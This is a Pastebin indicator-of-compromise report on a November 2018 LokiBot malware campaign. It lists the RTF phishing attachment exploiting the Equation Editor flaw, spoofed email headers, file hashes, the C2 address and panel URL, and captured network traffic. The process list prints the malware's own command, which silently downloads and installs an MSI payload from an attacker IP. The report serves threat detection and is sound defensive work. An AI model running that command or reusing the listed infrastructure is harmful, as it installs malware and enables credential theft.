VRad

#lokibot_151118

Nov 15th, 2018
557
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #LokiBot #11882 #MSI
  2.  
  3. https://pastebin.com/cqZg7kwr
  4.  
  5. previous_contacts:
  6. --------------
  7. 16/10/18 - https://pastebin.com/LPqjHUkQ
  8. 08/10/18 - https://pastebin.com/cZxQGbyq
  9. 01/10/18 - https://pastebin.com/AVWK3XsB
  10.  
  11. FAQ:
  12. https://radetskiy.wordpress.com/2018/10/19/ioc_lokibot_161018/
  13.  
  14. attack_vector
  15. --------------
  16. email attach doc(RTF) > 11882 > EQNEDT32.EXE GET > msiexec.exe /i 34.244.180.39/oo.msi
  17.  
  18. email_headers
  19. --------------
  20. Received: from elayouty.com (unknown [84.16.232.203]) by mail1.victim.com with smtp
  21. Received: from [::1] (port=48392 helo=server.sauditunnels.com)
  22. by server.sauditunnels.com with esmtpa (Exim 4.91)
  23. (envelope-from <meenakshi@uhlpharma.co.in>)
  24. Date: Thu, 15 Nov 2018 06:34:16 +0300
  25. From: PURCHASE <mshahbour@elayouty.com>
  26. To: undisclosed-recipients:;
  27. Subject: PURCHASE ORDER 25437
  28. X-Sender: meenakshi@uhlpharma.co.in
  29. User-Agent: Roundcube Webmail/1.3.6
  30.  
  31. files
  32. --------------
  33. SHA-256 1a711629a0cc2ec3e9c14d9500ff7cab1114474c98eb0d9392e269f50aea8513
  34. File name DOC_ORDER25437.doc (!) RTF
  35. File size 265.34 KB
  36.  
  37. SHA-256 917ef82d209a7293244706bbd625c3d055d152d6eb37c30e99b214d1a085e051
  38. File name oo.msi
  39. File size 1.25 MB
  40.  
  41.  
  42. Denis O'Brien @Malwageddon:
  43. "If metadata doesn't lie, the RTF file was created back in Sep."
  44.  
  45. activity
  46. **************
  47.  
  48. cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180{.} 39/oo.msi /quiet
  49.  
  50. PL_GET: 34.244.180.39/oo.msi
  51.  
  52. C2: 188.225.27.43
  53. h11p://sahakyanshn{.} com/baba1010/five/fre.php
  54.  
  55. netwrk
  56. --------------
  57. GET /oo.msi HTTP/1.1
  58. Connection: Keep-Alive
  59. Accept: */*
  60. User-Agent: Windows Installer
  61. Host: 34.244.180.39
  62.  
  63. 188.225.27.43 sahakyanshn{.} com POST /baba1010/five/fre.php HTTP/1.0 Mozilla/4.08 (Charon; Inferno)
  64.  
  65. comp
  66. --------------
  67. msiexec.exe 440 TCP 34.244.180.39 80 SYN_SENT
  68. MSIF29F.tmp 3348 TCP 188.225.27.43 80 ESTABLISHED
  69. [System] 0 TCP 188.225.27.43 80 TIME_WAIT
  70.  
  71. proc
  72. --------------
  73. "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  74. C:\Windows\SysWOW64\cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/oo.msi /quiet
  75. C:\Windows\SysWOW64\msiexec.exe /i http://34.244.180.39/oo.msi /quiet
  76. C:\Windows\system32\msiexec.exe /V
  77. "C:\Windows\Installer\MSIF29F.tmp"
  78.  
  79. persist
  80. --------------
  81. n/a
  82.  
  83. drop
  84. --------------
  85. C:\Windows\Installer\MSIF29F.tmp
  86. C:\Users\operator\AppData\Roaming\39B01F\FA74A3.exe
  87. C:\Users\operator\AppData\Roaming\39B01F\FA74A3.hdb
  88.  
  89. # # #
  90. doc (RTF) https://www.virustotal.com/#/file/1a711629a0cc2ec3e9c14d9500ff7cab1114474c98eb0d9392e269f50aea8513/details
  91. https://iris-h.services/#/pages/report/3dd0fe53b7f1ade6765df8da45b8b7c2ae6ed41b
  92. msi https://www.virustotal.com/#/file/917ef82d209a7293244706bbd625c3d055d152d6eb37c30e99b214d1a085e051/details
  93. https://analyze.intezer.com/#/analyses/3d6796ac-e098-4b61-aad7-3cc552dd2304
RAW Paste Data